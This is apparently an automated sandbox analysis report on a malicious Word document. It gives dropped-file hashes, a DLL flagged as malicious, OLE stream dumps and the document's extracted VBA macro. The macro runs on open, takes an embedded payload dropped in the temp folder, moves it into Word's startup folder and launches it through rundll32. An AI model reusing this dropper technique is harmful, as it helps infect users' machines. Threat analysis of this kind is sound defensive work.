                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A8G8P61LU6QPX84B4OVM.temp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12
                        Entropy (8bit):0.41381685030363374
                        Encrypted:false
                        SSDEEP:3:/l:
                        MD5:E4A1661C2C886EBB688DEC494532431C
                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                        Malicious:false
                        Preview:............

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12
                        Entropy (8bit):0.41381685030363374
                        Encrypted:false
                        SSDEEP:3:/l:
                        MD5:E4A1661C2C886EBB688DEC494532431C
                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                        Malicious:false
                        Preview:............

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF254fc.TMP (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):12
                        Entropy (8bit):0.41381685030363374
                        Encrypted:false
                        SSDEEP:3:/l:
                        MD5:E4A1661C2C886EBB688DEC494532431C
                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                        Malicious:false
                        Preview:............

                        C:\Users\user\Desktop\~$24_4109399728218.doc

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.07294752550309
                        Encrypted:false
                        SSDEEP:3:El//ePXlnwwU1lPlvllQjQ91Yn:Et22YjQ3Yn
                        MD5:1F35E41D38ED6B6B483EB427B8F8041C
                        SHA1:D2396977E17674119B9FACAF398949A8DC6965E5
                        SHA-256:9CA98F6B3C9BBBDA83CFB9A557F736CCAB09D6EAA9A5522D0178879822DE181F
                        SHA-512:3C1527917C23720DBD5D2E74AD1E7749E34C3FAD55C096429B542C0B506D6C7893CB06E17DC10F1075DBF646166B92A385CFA8BF67315672159E0C22410D7977
                        Malicious:false
                        Preview:.user...................................................e.y.u.p...............@J....@J.....4.........................................5...................n...

                        c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):720896
                        Entropy (8bit):6.648944468588579
                        Encrypted:false
                        SSDEEP:12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1
                        MD5:9DC6F214FC82D637DE2F68F3C519D339
                        SHA1:AAA425F7377D405BEA59B8ADFB65AFC0C8869886
                        SHA-256:2A8B737A4752060A308C4312B7C0CF6C05CDE5B370906286DEA9CDD36F5AA613
                        SHA-512:5CB0A6F3AB48E5127D5C9F638C035DD4B3A97F3EB31334D5BC3EEAFC164B31540FEA65D6E40ABFAC8566676C43E954F567DBC2AF81A629B4059AF7E466D75BEF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 77%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H#.......0....@..........................@...............................................`..J$...@..............................................................................................................CODE....h........................... ..`DATA.........0......................@...BSS.....%....P.......0...................idata..J$...`...&...0..............@....reloc...............V..............@..P.rsrc........@......................@..P.............@......................@..P........................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 24 13:32:00 2021, Last Saved Time/Date: Mon May 24 13:32:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
                        Entropy (8bit):7.39501459276194
                        TrID:
                        • Microsoft Word document (32009/1) 54.23%
                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                        File name:0524_4109399728218.doc
                        File size:1335808
                        MD5:14f4c470c207e22c3b0a4efa7b4200e8
                        SHA1:21180195396580a9ade32b589490cf3bc94d3b5b
                        SHA256:0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec
                        SHA512:4adc4275a9105bf94bdce4b9d5821026d99a4adf16579b1b2b23495efbd55cc7bc90a129248a9902c7c75828eac9ac665c8a34c203b428748d9f7b8a80b76823
                        SSDEEP:24576:nEIjrPUaphvGvGUZ93/semhXp7AsWIKHaY8k5faaboEy6r8zz1:n/jhvGvGU93097AFIKbv0WY/1
                        TLSH:4955D022F2A1CC37C177167D9C2BA6E85839BE113A28AD473BE43D0C5F397817925297
                        File Content Preview:........................>.......................`...........l...............W...X...Y...Z...[...\...]...^..._...o...p...q...r...s...t...u...v...w...x...y......................................................................................................

                        File Icon

                        Icon Hash:74f4e4c4cac4c4d4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "0524_4109399728218.doc"

                        Indicators
                        Has Summary Info:
                        Application Name:Microsoft Office Word
                        Encrypted Document:False
                        Contains Word Document Stream:True
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:True
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Summary
                        Code Page:1252
                        Title:
                        Subject:
                        Author:
                        Keywords:
                        Comments:
                        Template:
                        Last Saved By:
                        Revion Number:2
                        Total Edit Time:0
                        Create Time:2021-05-24 12:32:00
                        Last Saved Time:2021-05-24 12:32:00
                        Number of Pages:1
                        Number of Words:3
                        Number of Characters:21
                        Creating Application:
                        Security:0
                        Document Summary
                        Document Code Page:1252
                        Number of Lines:1
                        Number of Paragraphs:1
                        Thumbnail Scaling Desired:False
                        Company:
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:1048576

                        Streams with VBA

                        VBA File Name: ThisDocument.cls, Stream Size: 4635
                        General
                        Stream Path:Macros/VBA/ThisDocument
                        VBA File Name:ThisDocument.cls
                        Stream Size:4635
                        Data ASCII:. . . . . . . . . . . . . . . b . . . 0 . . . > . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . . . . . x . . . ( j . . H . G . _ o M q ' T . @ # . . . . . . . . . . . . . . . . . . . . . . G j g . M c s _ . . . . . . . . . . . . . . . . . . . . . . x . . . . G j g . M c s _ ( j . . H . G . _ o M q . . . . M E . . . . . . . . . . . . . . . . . . . . . P . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . . . . . . . L . . . . . L . . . . . . . . . . . . . . . . . < X . . .
                        Data Raw:01 16 03 00 06 00 01 00 00 8c 07 00 00 e4 00 00 00 62 02 00 00 30 08 00 00 3e 08 00 00 ca 0e 00 00 03 00 00 00 01 00 00 00 a6 0d 29 99 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 78 00 ff ff 00 00 28 6a c7 0e 1c 48 18 47 b8 0c 5f c2 6f 4d c3 71 f6 e7 27 e7 54 e8 03 40 bb b1 23 f4 0c 03 b4 e1 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Compare Text
Option Explicit
Dim pafs As String

Private Sub Document_Open()
Dim uis As String
uis = Options.DefaultFilePath(wdStartupPath)
If Dir(uis & "\ket.t") = "" Then
Call yyy

Call xxx

If pafs = "" Then

Else
Dim iel As String
Dim ued As String
ued = ".exe"
iel = Options.DefaultFilePath(wdStartupPath)
Name pafs As iel & "\ket.t"
Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
End If
End If
End Sub
Sub xxx()

 Dim FSO As Object
   Set FSO = CreateObject("Scripting.FileSystemObject")
Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath))
End Sub
Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub

 
 Sub Search(mds As Object)
 Dim Mysob As Object
 Dim Fil As Object
  
   For Each Mysob In mds.SubFolders
     Search Mysob
   Next Mysob
   For Each Fil In mds.Files
   
   If Fil.Name = "jax.k" Then
       
        pafs = Fil
        End If
   Next Fil
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub

                        Streams

                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                        General
                        Stream Path:\x1CompObj
                        File Type:data
                        Stream Size:114
                        Entropy:4.235956365095031
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:280
                        Entropy:2.376563663955734
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 412
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:412
                        Entropy:3.0880592875478543
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M y P c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                        Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 8500
                        General
                        Stream Path:1Table
                        File Type:ARC archive data, crunched
                        Stream Size:8500
                        Entropy:6.043049243175421
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                        Data Raw:1a 06 0f 00 12 00 01 00 77 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                        Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 564728, 1st item "\317iSv\357\252\322zW\304\227\2712v\346\3162\335\247O\027\326\333\035\025\031\336\273\265\323<\2726\272$I\222$I\222$I\222$I\222$I\036$;UO\222$I\222$I\222$I\222$I\222\344\001\222\002\300$I\222$I\222$I\222$I\222$y\300\244", Stream Size: 566201
                        General
                        Stream Path:Data
                        File Type:dBase III DBT, version number 0, next free block index 564728, 1st item "\317iSv\357\252\322zW\304\227\2712v\346\3162\335\247O\027\326\333\035\025\031\336\273\265\323<\2726\272$I\222$I\222$I\222$I\222$I\036$;UO\222$I\222$I\222$I\222$I\222\344\001\222\002\300$I\222$I\222$I\222$I\222$y\300\244"
                        Stream Size:566201
                        Entropy:7.972171141321045
                        Base64 Encoded:True
                        Data ASCII:. . D . d . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . V . . . . . . . . y . e . r . . . P . i . c . t . u . r . e . . 6 . 5 . 7 . . . C . : . \\ . U . s . e . r . s . \\ . M . y . P . c . \\ . D . e . s . k . t . o . p . \\ . B . u . i . l . d . e . r . _ . v . 6 . 6 . 7 . \\ . y . e . r . . . p . n . g . . . . . " . . . . .
                        Data Raw:f8 9d 08 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 4a df 2e e7 01 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 de 00 00 00 b2 04 0a f0 08 00 00 00 92 06 00 00 00 0a 00 00 93 00 0b f0 ac 00 00 00 7f 00 80 00 f9 01 04 41 02 00 00 00 05 c1 08 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 373
                        General
                        Stream Path:Macros/PROJECT
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:373
                        Entropy:5.3516482740641385
                        Base64 Encoded:True
                        Data ASCII:I D = " { D 2 A E 2 D D C - 3 2 0 0 - 4 E 4 F - B 6 A 9 - E D 7 0 5 E 1 D A 0 6 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 5 9 7 9 D 7 5 6 D 5 B 7 1 5 B 7 1 5 B 7 1 5 B 7 1 " . . D P B = " 7 F 7 D 7 7 6 F 8 B B 3 7 4 B 4 7 4 B 4 7 4 " . . G C = " 6 9 6 B 6 1 7 2 6 2 7 2 6 2 8 D " . . . . [ H o s t E x t e n d e r I n f o ]
                        Data Raw:49 44 3d 22 7b 44 32 41 45 32 44 44 43 2d 33 32 30 30 2d 34 45 34 46 2d 42 36 41 39 2d 45 44 37 30 35 45 31 44 41 30 36 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                        General
                        Stream Path:Macros/PROJECTwm
                        File Type:data
                        Stream Size:41
                        Entropy:3.0773844850752607
                        Base64 Encoded:False
                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2749
                        General
                        Stream Path:Macros/VBA/_VBA_PROJECT
                        File Type:data
                        Stream Size:2749
                        Entropy:4.365097759876284
                        Base64 Encoded:False
                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                        Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2199
                        General
                        Stream Path:Macros/VBA/__SRP_0
                        File Type:data
                        Stream Size:2199
                        Entropy:3.4656679441809715
                        Base64 Encoded:False
                        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ F . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ; a d 6 J U w j .
                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                        Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 193
                        General
                        Stream Path:Macros/VBA/__SRP_1
                        File Type:data
                        Stream Size:193
                        Entropy:1.7281568400588385
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m d s ^ . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
                        Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 1707
                        General
                        Stream Path:Macros/VBA/__SRP_2
                        File Type:data
                        Stream Size:1707
                        Entropy:2.995684462157246
                        Base64 Encoded:False
                        Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . Q . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . .
                        Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 0d 00 00 00 d1 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 c1 0d 00 00 00 00 00 00 00 00
                        Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 322
                        General
                        Stream Path:Macros/VBA/__SRP_3
                        File Type:data
                        Stream Size:322
                        Entropy:2.171223118059142
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . b . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 80 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 18 0e 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 514
                        General
                        Stream Path:Macros/VBA/dir
                        File Type:data
                        Stream Size:514
                        Entropy:6.261052462586738
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 3 b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . 9 m . . A ! O f f i c g O D . f . i . c g . .
                        Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 8a 33 a0 62 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                        Stream Path: ObjectPool/_1683339676/\x1CompObj, File Type: data, Stream Size: 76
                        General
                        Stream Path:ObjectPool/_1683339676/\x1CompObj
                        File Type:data
                        Stream Size:76
                        Entropy:3.093449526469053
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: ObjectPool/_1683339676/\x1Ole10Native, File Type: data, Stream Size: 721178
                        General
                        Stream Path:ObjectPool/_1683339676/\x1Ole10Native
                        File Type:data
                        Stream Size:721178
                        Entropy:6.6488088153470475
                        Base64 Encoded:True
                        Data ASCII:. . . . . . j a x . k . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ B u i l d e r _ v 6 6 7 \\ j a x . k . . . . . ' . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ j a x . k . . . . . M Z P . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . L ! T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:16 01 0b 00 02 00 6a 61 78 2e 6b 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 44 65 73 6b 74 6f 70 5c 42 75 69 6c 64 65 72 5f 76 36 36 37 5c 6a 61 78 2e 6b 00 00 00 03 00 27 00 00 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 6a 61 78 2e 6b 00 00 00 0b 00 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00
                        Stream Path: ObjectPool/_1683339676/\x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 4964
                        General
                        Stream Path:ObjectPool/_1683339676/\x3EPRINT
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Stream Size:4964
                        Entropy:3.3635954598868976
                        Base64 Encoded:False
